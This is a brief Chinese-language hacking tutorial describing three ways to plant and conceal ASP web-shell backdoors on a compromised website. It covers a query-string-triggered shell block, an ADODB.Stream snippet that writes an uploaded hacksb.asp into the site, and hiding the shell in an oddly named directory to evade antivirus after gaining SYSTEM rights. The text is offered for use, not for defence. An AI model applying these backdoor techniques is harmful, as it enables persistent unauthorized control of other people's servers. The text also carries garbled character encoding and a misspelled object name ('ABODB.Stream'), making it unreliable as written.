作者：普瑞斯特

第一種:

在我們要做手腳的asp文件里加入如下內(nèi)容

<%if request("action")="ok" then%>

shell代碼插在這里

<%end if%>

訪(fǎng)問(wèn)的時(shí)候在你作手腳的asp文件后面加上?action=ok,即可

第二種:

在我們要做手腳的asp文件里加入如下內(nèi)容

<%

on error resume next

strFileName = Request.QueryString("filer")

set objStream = Server.createObject("ABODB.Stream")

objStream.Type = 1

objStream.Open

objStream.LoadFromFile strFileName

objStream.SaveToFile Server.mappath("hacksb.asp"),2

%>

訪(fǎng)問(wèn)的時(shí)候在做手腳的asp文件后面加上?filer=xxx,

xxx為你本地上傳的一個(gè)路徑如C:\hacksb.asp,

上傳后在做手腳的asp的同文件夾中會(huì)自動(dòng)生成hacksb.asp

第三種:

前提得到system權(quán)限,

進(jìn)入網(wǎng)站目錄下一層

mkdir s…

copy hacksb.asp s…/

這樣殺毒軟件找不到的

訪(fǎng)問(wèn)http://網(wǎng)站/s…/hacksb.asp即可